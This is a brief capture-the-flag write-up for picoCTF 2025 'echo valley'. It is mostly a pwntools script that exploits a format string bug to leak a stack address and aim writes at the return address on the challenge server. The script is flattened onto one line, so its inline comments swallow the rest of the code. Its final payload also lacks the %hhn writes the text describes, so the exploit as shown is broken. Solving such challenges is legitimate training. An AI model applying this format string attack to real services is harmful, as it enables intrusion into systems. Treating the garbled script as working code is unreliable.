pico2025 echo valley

Format string vulnerability inside a loop lets us change the value of the return address by leaking both the return address and a pointer on the stack and then using %hhn to write a byte at a time. from pwn import * # Set up connection host = 'shape-facility.picoctf.net' port = 52223 # Connect to the remote server conn = remote(host, port) # Wait for the specific prompt print(conn.recvuntil(b'Try Shouting:')) # Send the desired input conn.sendline(b'%20$llx') print(conn.recvuntil(b'You heard in the distance: ')) # get rid of newline response=conn.recvline().decode('utf-8')[:-1] number=int(response,16) # old rbp was just above return address, so subtract 8 number=number-8 print(response,p64(number)) tosend=(b'AAAAAAAAAAAAAAAAAAAAAAAA'+p64(number)+p64(number+1)) conn.sendline(tosend) print(tosend) conn.interactive() # Close the connection conn.close()